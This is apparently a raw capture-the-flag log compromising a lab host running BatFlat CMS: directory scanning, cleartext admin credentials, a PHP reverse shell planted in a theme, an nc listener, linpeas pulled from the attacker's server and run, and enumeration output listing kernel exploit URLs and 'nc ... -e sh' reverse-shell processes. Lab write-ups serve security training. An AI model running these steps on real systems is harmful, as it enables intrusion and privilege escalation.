[>-------------------] - 4s 4/4614 1h found:0 errors:0
200 GET 143l 471w 0c http://newcms.mofo.pwn:8888/
[>-------------------] - 4s 6/4614 1h found:0 errors:0
[>-------------------] - 4s 6/4614 1h found:0 errors:0
200 GET 1l 4w 0c http://newcms.mofo.pwn:8888/admin
crash it (again)
http://newcms.mofo.pwn:8888/admin/ (BatFlat)
bash-4.4$ cat creds.txt
cat creds.txt
admin:BAraTuwwWzx3gG
login
https://www.exploit-db.com/exploits/49573
Settings>Theme>Hello (PHP PentestMonkey)
https://www.revshells.com/
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
now go to newcms.mofo.pwn:8888/
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.214.203.
Ncat: Connection from 10.10.214.203:46396.
Linux Durius 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) x86_64 GNU/Linux
18:13:46 up 16 min, 0 users, load average: 0.00, 0.02, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (425): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Durius:/$ ls -la
ls -la
total 84
drwxr-xr-x 22 root root 4096 Apr 17 2020 .
drwxr-xr-x 22 root root 4096 Apr 17 2020 ..
drwxr-xr-x 2 root root 4096 Apr 17 2020 bin
drwxr-xr-x 3 root root 4096 Apr 23 2020 boot
drwxr-xr-x 15 root root 2820 Jan 26 17:57 dev
drwxr-xr-x 90 root root 4096 Jan 26 17:57 etc
drwxr-xr-x 4 root root 4096 Apr 23 2020 home
lrwxrwxrwx 1 root root 31 Apr 17 2020 initrd.img -> /boot/initrd.img-3.16.0-6-amd64
drwxr-xr-x 14 root root 4096 Apr 17 2020 lib
drwxr-xr-x 2 root root 4096 Apr 17 2020 lib64
drwx------ 2 root root 16384 Apr 17 2020 lost+found
drwxr-xr-x 3 root root 4096 Apr 17 2020 media
drwxr-xr-x 2 root root 4096 Apr 17 2020 mnt
drwxr-xr-x 2 root root 4096 Apr 17 2020 opt
dr-xr-xr-x 105 root root 0 Jan 26 17:56 proc
drwx------ 4 root root 4096 Apr 23 2020 root
drwxr-xr-x 20 root root 780 Jan 26 17:57 run
drwxr-xr-x 2 root root 4096 Apr 17 2020 sbin
drwxr-xr-x 2 root root 4096 Apr 17 2020 srv
dr-xr-xr-x 13 root root 0 Jan 26 17:56 sys
drwxrwxrwt 7 root root 4096 Jan 26 18:09 tmp
drwxr-xr-x 10 root root 4096 Apr 17 2020 usr
drwxr-xr-x 12 root root 4096 Apr 23 2020 var
lrwxrwxrwx 1 root root 27 Apr 17 2020 vmlinuz -> boot/vmlinuz-3.16.0-6-amd64
www-data@Durius:/$ cd /home
cd /home
www-data@Durius:/home$ ls
ls
benclower
me
www-data@Durius:/home$ cd me
cd me
bash: cd: me: Permission denied
www-data@Durius:/home$ cd benclower
cd benclower
bash: cd: benclower: Permission denied
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ locate linpeas
/home/kali/0day_ctf/linpeas.sh
/home/kali/Downloads/linpeas.sh
/home/kali/hackthebox/linpeas.sh
┌──(kali㉿kali)-[~/Downloads/time_flies]
└─$ cd /home/kali/0day_ctf/
┌──(kali㉿kali)-[~/0day_ctf]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.214.203 - - [26/Jan/2023 19:16:34] "GET /linpeas.sh HTTP/1.1" 200 -
www-data@Durius:/home$ cd /tmp
cd /tmp
www-data@Durius:/tmp$ wget http://10.8.19.103:8000/linpeas.sh
wget http://10.8.19.103:8000/linpeas.sh
converted 'http://10.8.19.103:8000/linpeas.sh' (ANSI_X3.4-1968) -> 'http://10.8.19.103:8000/linpeas.sh' (UTF-8)
--2023-01-26 18:16:34-- http://10.8.19.103:8000/linpeas.sh
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 777018 (759K) [text/x-sh]
Saving to: 'linpeas.sh'
0K .......... .......... .......... .......... .......... 6% 124K 6s
50K .......... .......... .......... .......... .......... 13% 238K 4s
100K .......... .......... .......... .......... .......... 19% 4.16M 3s
150K .......... .......... .......... .......... .......... 26% 268K 2s
200K .......... .......... .......... .......... .......... 32% 3.33M 2s
250K .......... .......... .......... .......... .......... 39% 6.38M 1s
300K .......... .......... .......... .......... .......... 46% 7.15M 1s
350K .......... .......... .......... .......... .......... 52% 303K 1s
400K .......... .......... .......... .......... .......... 59% 5.16M 1s
450K .......... .......... .......... .......... .......... 65% 5.55M 1s
500K .......... .......... .......... .......... .......... 72% 5.26M 0s
550K .......... .......... .......... .......... .......... 79% 6.99M 0s
600K .......... .......... .......... .......... .......... 85% 7.01M 0s
650K .......... .......... .......... .......... .......... 92% 7.18M 0s
700K .......... .......... .......... .......... .......... 98% 315K 0s
750K ........ 100% 1.65M=1.2s
2023-01-26 18:16:35 (623 KB/s) - 'linpeas.sh' saved [777018/777018]
www-data@Durius:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@Durius:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|------------------------------------------------------------------------ ╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 3.16.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: Durius
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.16.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
Distributor ID: Debian
Description: Debian GNU/Linux 8.11 (jessie)
Release: 8.11
Codename: jessie
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ CVEs Check
./linpeas.sh: 1197: ./linpeas.sh: [[: not found
./linpeas.sh: 1197: ./linpeas.sh: rpm: not found
./linpeas.sh: 1197: ./linpeas.sh: 0: not found
./linpeas.sh: 1207: ./linpeas.sh: [[: not found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Thu Jan 26 18:17:03 CST 2023
18:17:03 up 20 min, 0 users, load average: 0.28, 0.09, 0.09
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
╔══════════╣ Unmounted file-system?
╚ Check if you can mount unmounted devices
UUID=9644d352-b5a4-4557-bc99-59d12b48946c / ext4 errors=remount-ro 0 1
UUID=1fadf358-58e7-49b2-b3e4-5090ad71e3c6 none swap sw 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
USER=www-data
SHLVL=1
HOME=/var/www
OLDPWD=/home
_=./linpeas.sh
HISTSIZE=0
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-1247] nginxed-root.sh
Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
Exposure: probable
Tags: [ debian=8 ],ubuntu=14.04|16.04|16.10
Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2015-9322] BadIRET
Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
Exposure: less probable
Tags: RHEL<=7,fedora=20
Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Download URL: https://www.exploit-db.com/download/39166
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/39230
[+] [CVE-2015-3290] espfix64_NMI
Details: http://www.openwall.com/lists/oss-security/2015/08/04/8
Exposure: less probable
Download URL: https://www.exploit-db.com/download/37722
[+] [CVE-2015-1328] overlayfs
Details: http://seclists.org/oss-sec/2015/q2/717
Exposure: less probable
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Download URL: https://www.exploit-db.com/download/37292
[+] [CVE-2014-5207] fuse_suid
Details: https://www.exploit-db.com/exploits/34923/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/34923
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
Source: http://www.exploit-db.com/exploits/39230
╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)
╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/docker
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.1 0.4 110740 5008 ? Ss 17:56 0:01 /sbin/init
root 141 0.0 0.2 28896 3060 ? Ss 17:56 0:00 /lib/systemd/systemd-journald
root 145 0.1 0.3 40844 3328 ? Ss 17:56 0:01 /lib/systemd/systemd-udevd
root 367 0.0 0.7 25404 7736 ? Ss 17:57 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 399 0.0 0.2 37084 2604 ? Ss 17:57 0:00 /sbin/rpcbind -w
statd 409 0.0 0.2 37284 2924 ? Ss 17:57 0:00 /sbin/rpc.statd
└─(Caps) 0x0000000000000400=cap_net_bind_service
root 423 0.0 0.0 23360 204 ? Ss 17:57 0:00 /usr/sbin/rpc.idmapd
root 425 0.0 2.4 383288 24584 ? Ss 17:57 0:00 php-fpm: master process (/etc/php/7.2/fpm/php-fpm.conf)
www-data 765 0.0 2.2 459796 22564 ? S 17:57 0:00 _ php-fpm: pool www
www-data 766 0.0 2.2 459800 23056 ? S 17:57 0:00 _ php-fpm: pool www
www-data 1403 0.0 0.0 4340 772 ? S 18:13 0:00 _ sh -c uname -a; w; id; bash -i
www-data 1407 0.0 0.3 20228 3188 ? S 18:13 0:00 _ bash -i
www-data 1412 0.0 0.2 5184 2432 ? S 18:16 0:00 _ /bin/sh ./linpeas.sh
www-data 4748 0.0 0.0 5184 952 ? S 18:17 0:00 _ /bin/sh ./linpeas.sh
www-data 4752 0.0 0.2 17656 2084 ? R 18:17 0:00 | _ ps fauxwww
www-data 4751 0.0 0.0 5184 952 ? S 18:17 0:00 _ /bin/sh ./linpeas.sh
daemon[0m 427 0.0 0.1 19028 1672 ? Ss 17:57 0:00 /usr/sbin/atd -f
root 428 0.0 0.2 27528 2768 ? Ss 17:57 0:00 /usr/sbin/cron -f
root 430 0.0 0.3 258676 3416 ? Ssl 17:57 0:00 /usr/sbin/rsyslogd -n
message+ 432 0.0 0.3 42248 3464 ? Ss 17:57 0:00 /usr/bin/dbus-daemon[0m --system --address=systemd: --nofork --nopidfile --systemd-activation
└─(Caps) 0x0000000020000000=cap_audit_write
root 438 0.0 0.2 19880 2608 ? Ss 17:57 0:00 /lib/systemd/systemd-logind
root 454 0.0 0.1 4260 1664 ? Ss 17:57 0:00 /usr/sbin/acpid
root 458 0.2 7.3 650032 74668 ? Ssl 17:57 0:02 /usr/bin/dockerd -H fd://
root 822 0.1 3.7 415276 38812 ? Ssl 17:57 0:01 _ docker-containerd --config /var/run/docker/containerd/containerd.toml
root 1026 0.0 0.4 7500 4416 ? Sl 17:57 0:00 _ docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon[0m/io.containerd.runtime.v1.linux/moby/ef64b5e754cddbc138fda284da0108f513a116a4ccfc32016a376a2328dc5527 -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
root 1091 0.0 0.2 11696 2604 ? Ss+ 17:57 0:00 | _ /bin/bash /usr/sbin/run-vsftpd.sh
root 1286 0.0 0.3 53288 3668 ? S+ 17:57 0:00 | _ /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
root 1039 0.0 0.4 7500 4432 ? Sl 17:57 0:00 _ docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon[0m/io.containerd.runtime.v1.linux/moby/df43dc369c140d1c4cb8ca1bfb71f6dd7092d8fc32fff32fa2fe0b969876ffd1 -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
statd 1092 0.0 1.8 207856 18652 ? Ssl+ 17:57 0:00 | _ /usr/sbin/named -4 -g -u bind -n 1 -c /etc/bind/named.conf
└─(Caps) 0x0000000000000400=cap_net_bind_service
root 1048 0.0 0.4 7500 4092 ? Sl 17:57 0:00 _ docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon[0m/io.containerd.runtime.v1.linux/moby/1da62c6e70c5a40a858b19534075c74726626c9f35195ac26923b1cde4ebd826 -address /var/run/docker/containerd/docker-containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc
root 1105 0.1 1.7 85960 17724 ? Ss+ 17:57 0:01 _ /usr/bin/python2 /usr/bin/supervisord
root 1292 0.0 0.3 13832 3896 ? S 17:57 0:00 _ nginx: master process /usr/sbin/nginx
systemd+ 1294 0.0 0.1 14288 1952 ? S 17:57 0:00 | _ nginx: worker process
me 1293 0.1 2.4 110052 25340 ? S 17:57 0:01 _ /usr/sbin/uwsgi --ini /etc/uwsgi/uwsgi.ini
me 1295 0.0 1.9 110460 19784 ? S 17:57 0:00 _ /usr/sbin/uwsgi --ini /etc/uwsgi/uwsgi.ini
me 1307 0.0 0.0 1564 4 ? S 17:59 0:00 | _ /bin/sh -c cat upload/a.txt;nc 168301415 443 -e sh
me 1309 0.0 0.0 1564 4 ? S 17:59 0:00 | _ sh
me 1310 0.0 0.5 12748 6080 ? S 17:59 0:00 | _ python -c import pty;pty.spawn("/bin/bash")
me 1311 0.0 0.1 6348 1976 ? Ss 17:59 0:00 | _ /bin/bash
me 1316 0.0 0.1 1888 1116 ? Sl+ 18:01 0:00 | _ ./shell.elf
me 1296 0.0 1.9 110984 20368 ? S 17:57 0:00 _ /usr/sbin/uwsgi --ini /etc/uwsgi/uwsgi.ini
me 1320 0.0 0.0 1564 4 ? S 18:04 0:00 | _ /bin/sh -c cat upload/a.txt;nc 168301415 443 -e sh
me 1322 0.0 0.0 1564 4 ? S 18:04 0:00 | _ sh
me 1324 0.0 0.5 12748 6108 ? S 18:04 0:00 | _ python -c import pty;pty.spawn("/bin/bash")
me 1325 0.0 0.1 6348 1972 ? Ss+ 18:04 0:00 | _ /bin/bash
me 1323 0.0 1.9 110104 19440 ? S 18:04 0:00 _ /usr/sbin/uwsgi --ini /etc/uwsgi/uwsgi.ini
root 460 0.0 0.5 55204 5432 ? Ss 17:57 0:00 /usr/sbin/sshd -D
root 513 0.0 0.1 14420 2028 tty1 Ss+ 17:57 0:00 /sbin/agetty --noclear tty1 linux
root 514 0.0 0.2 14240 2160 ttyS0 Ss+ 17:57 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt102
root 730 0.0 0.3 89560 3148 ? Ss 17:57 0:00 nginx: master process /usr/sbin/nginx -g daemon[0m on; master_process on;
www-data 731 0.0 0.3 89920 3800 ? S 17:57 0:00 _ nginx: worker process
www-data 732 0.0 0.3 89920 3800 ? S 17:57 0:00 _ nginx: worker process
www-data 733 0.0 0.4 90260 4740 ? S 17:57 0:00 _ nginx: worker process
www-data 734 0.0 0.4 90264 4960 ? S 17:57 0:00 _ nginx: worker process
Debian-+ 745 0.0 0.3 53308 3284 ? Ss 17:57 0:00 /usr/sbin/exim4 -bd -q30m
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Jun 11 2015 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Apr 22 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
-rw-r--r-- 1 root root 712 Aug 14 2019 php
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Apr 22 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
-rwxr-xr-x 1 root root 625 Sep 30 2019 apache2
-rwxr-xr-x 1 root root 15000 Jan 22 2019 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 1597 May 2 2016 dpkg
-rwxr-xr-x 1 root root 4125 Sep 5 2019 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Apr 17 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 102 Jun 11 2015 .placeholder
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2023-01-26 18:39:00 CST 21min left Thu 2023-01-26 18:09:01 CST 8min ago phpsessionclean.timer phpsessionclean.service
Fri 2023-01-27 18:11:57 CST 23h left Thu 2023-01-26 18:11:57 CST 5min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a n/a n/a n/a systemd-readahead-done.timer systemd-readahead-done.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/dbus.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
